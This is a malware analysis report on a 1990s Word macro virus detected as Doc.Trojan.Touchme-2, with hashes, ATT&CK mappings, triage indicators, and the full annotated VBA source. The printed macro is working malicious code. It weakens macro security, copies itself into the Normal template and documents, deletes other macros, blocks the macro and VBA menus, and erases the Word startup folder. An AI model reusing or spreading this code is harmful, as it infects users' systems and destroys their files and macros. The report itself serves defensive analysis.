Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9344238c7b44185…

MALICIOUS

Office (OLE)

49.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3e661bb0e956893fe6a751811bd314a0 SHA-1: a76f70f797188393df9ac5533474422d190a2b58 SHA-256: e9344238c7b441850048efd5fc1d3e3be419f19d19138920e692bbad3cfad9fa
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

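The sample contains VBA macros, including a Document_Open handler that runs when the document is opened with macros enabled, a common execution technique for malicious documents. The script attempts to disable macro security settings and copies its code into the Normal template, which gives it persistence and lets it spread to other documents opened afterwards. It also deletes the other VBA components from the document and the template, and deletes every file in the Word startup folder. The persistence visible in the script goes through the Normal template and the Word startup folder (Application.StartupPath), not through Windows Run keys or the Windows Startup folder, so ATT&CK T1137.001 (Office Template Macros) describes it more closely than T1547.001. The ClamAV detection 'Doc.Trojan.Touchme-2' further supports its malicious nature.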

Heuristics 3

  • ClamAV: Doc.Trojan.Touchme-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Touchme-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3772 bytes
SHA-256: 77162d18d26036e7c69cdc52e2dd22698d350e0ef47ce7ca0d657ab61ab3f12d
Detection
ClamAV: Doc.Trojan.Touchme-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Created by Reza Pc 212
' Copyright © ReYoKh Team Labs
' University of Gunadarma
'
' fUcKig aLl aNtiVirUS, cAn YoU tOuCh mE ? DOnt dReAM !
'
' Last Up-Date 16 November 1999 [09.00:00]

' Analyst summary: shared routine called by every event handler in this module.
' In order, it (1) weakens Word's macro-protection settings, (2) copies this
' module's code between the active document and the Normal template,
' (3) deletes every other VBA component from both, (4) shows a greeting
' balloon on three fixed dates, (5) writes a stub module "EcHa" and imports
' it into the Normal template, and (6) deletes all files in the Word startup
' folder.
' Host indicators to check during triage: the marker comment on line 7 of the
' Normal template's first code module, a module named "EcHa" in the Normal
' template, user macros missing from the template, and an emptied Word
' startup folder.
Private Sub Infected()
    ' Every runtime error is swallowed, so a static read shows the intended
    ' behaviour only; which steps actually ran must be confirmed on the host.
    On Error Resume Next
    Dim Reg
    Dim Active As Boolean
    ' Only Name is typed As String here; ID and Ultah are Variants, and Ultah
    ' is not used anywhere in this routine.
    Dim ID, Ultah, Name As String
    Dim AD, NT As Object
    ' Infection marker: the same text as the "Last Up-Date" comment in the
    ' module header.
    ID = "' Last Up-Date 16 November 1999 [09.00:00]"
    ' Code modules of the first VBA component in the active document (AD) and
    ' in the Normal template (NT) - presumably ThisDocument in both; confirm.
    Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    ' Macro-security key for Office 9.0 (Word 2000).
    ' NOTE(review): the path is stored in Reg, but both calls below pass regs,
    ' a name that is neither declared nor assigned in this listing. As written,
    ' the registry branch may not reach this key and the Else branch looks like
    ' the likelier path - TODO confirm on the host; do not treat a changed
    ' Level value as the only indicator.
    Reg = "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
    If System.PrivateProfileString("", regs, "Level") <> "" Then
        ' Greys out the Security... entry on the Macro menu and writes 1 to
        ' "Level" (1 is the Low macro-security setting in Office 2000).
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", regs, "Level") = 1&
    Else
        ' Fallback path: turns off the macro virus warning, the file-conversion
        ' confirmation, and the prompt shown before Normal template changes
        ' are saved, so the template modification below is silent.
        With Options
            .VirusProtection = False
            .ConfirmConversions = False
            .SaveNormalPrompt = False
        End With
    End If
    ' Auto macros are switched off for the duration of the routine and
    ' switched back on in the last statement.
    WordBasic.disableautomacros True
    ' Template infection: if line 7 of the template module is not the marker,
    ' its code is erased and replaced with the active document's code.
    ' (Attribute lines are not part of the CodeModule text, so line 7 appears
    ' to be the header's "Last Up-Date" comment - confirm.)
    If NT.Lines(7, 1) <> ID Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.AddFromString AD.Lines(1, AD.CountOfLines)
    End If
    ' Document infection: the same check in the other direction, copying the
    ' template's code into a document that does not carry the marker.
    If AD.Lines(7, 1) <> ID Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.AddFromString NT.Lines(1, NT.CountOfLines)
    End If
    ' Destructive step: removes every VBA component not named "ThisDocument"
    ' from the Normal template. Legitimate user macros stored there are lost;
    ' recovery needs a template backup.
    For Each Obj In NormalTemplate.VBProject.VBComponents
        If Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    ' Same removal applied to the active document.
    For Each Obj In ActiveDocument.VBProject.VBComponents
        If Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=ActiveDocument.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    ' Date trigger: Name is set only on 5 March, 8 August and 22 December.
    If Day(Date) = 5 And Month(Date) = 3 Then Name = "REZA"
    If Day(Date) = 8 And Month(Date) = 8 Then Name = "YOMBI"
    If Day(Date) = 22 And Month(Date) = 12 Then Name = "NELIS"
    If Name <> "" Then
        ' Visible symptom on the trigger dates: an Office Assistant balloon.
        ' The Assistant's previous visibility is saved and restored afterwards.
        Active = Assistant.Visible
        Assistant.Visible = True
        With Assistant.NewBalloon
            ' Indonesian text, roughly: "ReYoKh Team Labs wishes / Happy
            ' Birthday !!! / to <Name>, always be happy".
            .Text = "ReYoKh Team Labs mengucapkan" + Chr(13) + Chr(13) + _
                    "Selamat Ulang Tahun  !!!" + Chr(13) + "untuk " + Name + ", bahagia selalu"
            .Show
        End With
        Assistant.Visible = Active
    End If
    ' Writes a module source file named "EcHa" into the Word startup folder.
    ' Its sub names (ViewVBCode, ToolsMacro, ToolsOptions) match built-in Word
    ' command names; presumably the empty stubs override those commands so the
    ' macro dialog and the VBA editor do not open - confirm in dynamic analysis.
    Open Application.StartupPath + "\EcHa" For Output As #1
    Print #1, "Attribute VB_Name=" + Chr(34) + "EcHa" + Chr(34)
    Print #1, "Sub ViewVBCode"
    Print #1, "End Sub"
    Print #1, "Sub ToolsMacro"
    Print #1, "End Sub"
    Print #1, "Sub AutoExec"
    Print #1, "    ToolsMacro"
    Print #1, "End Sub"
    ' The ToolsOptions stub sets VirusProtection back to True before showing
    ' the Options dialog - presumably so the setting looks untouched to a user
    ' who checks it; confirm.
    Print #1, "Sub ToolsOptions"
    Print #1, "    Options.VirusProtection=True"
    Print #1, "    Dialogs(wdDialogToolsOptions).Show"
    Print #1, "End Sub"
    Close #1
    ' The stub is imported as a component of the Normal template, so it
    ' persists there after the file on disk is removed.
    NormalTemplate.VBProject.VBComponents.Import Application.StartupPath + "\EcHa"
    ' Destructive step: deletes every file in the Word startup folder. That
    ' includes the EcHa file just written (so it may not be found on disk
    ' later) and any legitimate templates or add-ins kept in that folder.
    Kill Application.StartupPath + "\*.*"
    WordBasic.disableautomacros False
End Sub
' Word Document event handler: runs when the document is closed and does
' nothing except call Infected.
Private Sub Document_Close()
    Infected
End Sub
' Word Document event handler: runs when the document is opened with macros
' enabled and does nothing except call Infected. This is the handler behind
' the report's OLE_VBA_DOCOPEN finding.
Private Sub Document_Open()
    Infected
End Sub
' Calls Infected. NOTE(review): Save does not appear to be one of the events
' Word raises on the Document object (New, Open, Close), so this handler
' presumably never fires on its own - confirm in dynamic analysis.
Private Sub Document_Save()
    Infected
End Sub
' Word Document event handler: runs when a new document is created from a
' template that carries this code, and does nothing except call Infected.
' With the code in the Normal template this presumably covers each new blank
' document - confirm.
Private Sub Document_New()
    Infected
End Sub
' Calls Infected. NOTE(review): Exit does not appear to be one of the events
' Word raises on the Document object, so this handler presumably never fires
' on its own - confirm in dynamic analysis.
Private Sub Document_Exit()
    Infected
End Sub
' Calls Infected. NOTE(review): Exec does not appear to be one of the events
' Word raises on the Document object, so this handler presumably never fires
' on its own - confirm in dynamic analysis.
Private Sub Document_Exec()
    Infected
End Sub